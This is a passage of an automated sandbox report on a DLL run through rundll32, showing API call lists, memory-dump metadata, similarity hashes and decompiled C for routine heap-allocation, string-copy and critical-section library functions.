                                                                        0x10024db7
                                                                        0x10024db9
                                                                        0x10024dc4
                                                                        0x10024dc4
                                                                        0x10024cb7
                                                                        0x10024cbd
                                                                        0x10024cc2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10024cc8
                                                                        0x10024cd5
                                                                        0x10024cd9
                                                                        0x10024cdb
                                                                        0x10024cdb
                                                                        0x10024cf0
                                                                        0x10024cf7
                                                                        0x10024cfe
                                                                        0x10024d05
                                                                        0x10024d08
                                                                        0x10024d0b
                                                                        0x10024d11
                                                                        0x10024d5d
                                                                        0x10024d5d
                                                                        0x10024d63
                                                                        0x10024d67
                                                                        0x10024d7a
                                                                        0x10024d7d
                                                                        0x10024d82
                                                                        0x10024d93
                                                                        0x10024da2
                                                                        0x10024da2
                                                                        0x00000000
                                                                        0x10024d13
                                                                        0x10024d1a
                                                                        0x10024d1c
                                                                        0x10024d1f
                                                                        0x10024d22
                                                                        0x10024d25
                                                                        0x10024d2d
                                                                        0x10024d2f
                                                                        0x10024d30
                                                                        0x10024d36
                                                                        0x10024d39
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10024d4b
                                                                        0x10024d59
                                                                        0x10024da7
                                                                        0x10024dac
                                                                        0x10024db3
                                                                        0x00000000
                                                                        0x10024db4

                                                                        APIs
                                                                        • lstrcpynA.KERNEL32(00000000,?,?,?), ref: 10024CF7
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10024D25
                                                                        • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000104), ref: 10024D59
                                                                          • Part of subcall function 1002565C: GetFileTitleA.COMDLG32(?,?,00000000,00000000,00000104), ref: 1002568C
                                                                        • lstrcpynA.KERNEL32(00000000,?,?,?,?,00000104,00000000,00000000,00000000), ref: 10024D93
                                                                          • Part of subcall function 10024AA1: lstrlenA.KERNEL32(?), ref: 10024AAC
                                                                          • Part of subcall function 10024AA1: lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcpyn$FileTitlelstrcmpilstrcpylstrlen
                                                                        • String ID:
                                                                        • API String ID: 1551867014-0
                                                                        • Opcode ID: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
                                                                        • Instruction ID: f695b848086fad3498a552c61b02124914b138edf6a9cb0088e4b153e3f01fcd
                                                                        • Opcode Fuzzy Hash: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
                                                                        • Instruction Fuzzy Hash: 39418B76900269AFCB51CF68DC80EEA77F9EF49344F010199F99997251DB70EE81CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10013EDE Relevance: 5.1, APIs: 4, Instructions: 57memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10013EDE() {
				signed int _t15;
				void* _t17;
				void* _t18;
				intOrPtr* _t20;
				void* _t24;
				signed int _t26;
				void* _t27;
				intOrPtr* _t30;

				_t15 =  *0x10050a48; // 0x0
				_t26 =  *0x10050a58; // 0x0
				if(_t15 != _t26) {
					L4:
					_t27 =  *0x10050a4c; // 0x0
					_t30 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x10050a60, 8, 0x41c4);
					 *(_t30 + 0x10) = _t17;
					if(_t17 != 0) {
						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
						 *(_t30 + 0xc) = _t18;
						if(_t18 != 0) {
							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
							 *_t30 = 0;
							 *((intOrPtr*)(_t30 + 4)) = 0;
							 *0x10050a48 =  *0x10050a48 + 1;
							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
							_t20 = _t30;
						} else {
							HeapFree( *0x10050a60, 0,  *(_t30 + 0x10));
							goto L5;
						}
					} else {
						L5:
						_t20 = 0;
					}
					return _t20;
				} else {
					_t2 = _t26 * 4; // 0x50
					_t24 = HeapReAlloc( *0x10050a60, 0,  *0x10050a4c, _t26 + _t2 + 0x50 << 2);
					if(_t24 != 0) {
						 *0x10050a58 =  *0x10050a58 + 0x10;
						 *0x10050a4c = _t24;
						_t15 =  *0x10050a48; // 0x0
						goto L4;
					} else {
						return 0;
					}
				}
			}











                                                                        0x10013ede
                                                                        0x10013ee3
                                                                        0x10013eee
                                                                        0x10013f24
                                                                        0x10013f24
                                                                        0x10013f3b
                                                                        0x10013f3e
                                                                        0x10013f46
                                                                        0x10013f49
                                                                        0x10013f5c
                                                                        0x10013f64
                                                                        0x10013f67
                                                                        0x10013f7b
                                                                        0x10013f7f
                                                                        0x10013f81
                                                                        0x10013f84
                                                                        0x10013f8d
                                                                        0x10013f90
                                                                        0x10013f69
                                                                        0x10013f73
                                                                        0x00000000
                                                                        0x10013f73
                                                                        0x10013f4b
                                                                        0x10013f4b
                                                                        0x10013f4b
                                                                        0x10013f4b
                                                                        0x10013f94
                                                                        0x10013ef0
                                                                        0x10013ef0
                                                                        0x10013f05
                                                                        0x10013f0d
                                                                        0x10013f13
                                                                        0x10013f1a
                                                                        0x10013f1f
                                                                        0x00000000
                                                                        0x10013f0f
                                                                        0x10013f12
                                                                        0x10013f12
                                                                        0x10013f0d

                                                                        APIs
                                                                        • HeapReAlloc.KERNEL32(00000000,00000050,00000000,100144CF,00000000,?,00000000), ref: 10013F05
                                                                        • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,100144CF,00000000,?,00000000), ref: 10013F3E
                                                                        • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 10013F5C
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 10013F73
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocHeap$FreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 3499195154-0
                                                                        • Opcode ID: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
                                                                        • Instruction ID: aeb6b17fbef21620812925e1521d5c5e2c0640cb2d2eb2dc13b54a0eeae557ec
                                                                        • Opcode Fuzzy Hash: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
                                                                        • Instruction Fuzzy Hash: D0116D346003659FE761CF19DCC5D1A7BB1FB81760710852DF156DA5B1C3719882DB01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10037A1B Relevance: 5.0, APIs: 4, Instructions: 33COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10037A1B(signed int _a4) {
				struct _CRITICAL_SECTION* _t13;
				signed int _t21;
				intOrPtr* _t24;

				if( *0x1004f350 == 0) {
					E100379F7();
				}
				_t21 = _a4;
				_t24 = 0x1004f158 + _t21 * 4;
				if( *_t24 == 0) {
					EnterCriticalSection(0x1004f19c);
					if( *_t24 == 0) {
						InitializeCriticalSection(0x1004f1b8 + (_t21 + _t21 * 2) * 8);
						 *_t24 =  *_t24 + 1;
					}
					LeaveCriticalSection(0x1004f19c);
				}
				_t13 = 0x1004f1b8 + (_t21 + _t21 * 2) * 8;
				EnterCriticalSection(_t13);
				return _t13;
			}






                                                                        0x10037a22
                                                                        0x10037a24
                                                                        0x10037a24
                                                                        0x10037a32
                                                                        0x10037a36
                                                                        0x10037a40
                                                                        0x10037a49
                                                                        0x10037a4e
                                                                        0x10037a5b
                                                                        0x10037a61
                                                                        0x10037a61
                                                                        0x10037a64
                                                                        0x10037a6a
                                                                        0x10037a6e
                                                                        0x10037a76
                                                                        0x10037a7b

                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A49
                                                                        • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A5B
                                                                        • LeaveCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A64
                                                                        • EnterCriticalSection.KERNEL32(00000000,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A76
                                                                          • Part of subcall function 100379F7: InitializeCriticalSection.KERNEL32(1004F19C,10037A29,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A0F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterInitialize$Leave
                                                                        • String ID:
                                                                        • API String ID: 713024617-0
                                                                        • Opcode ID: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
                                                                        • Instruction ID: b71c326a3937b492ac304e5451021ab9c1c46bd2d9d00a0dd2066787caa8deb7
                                                                        • Opcode Fuzzy Hash: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
                                                                        • Instruction Fuzzy Hash: EFF0493200026EEFD711EF95CC88A66B3ACFB85322F40082AE148C2022D734B556CAA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%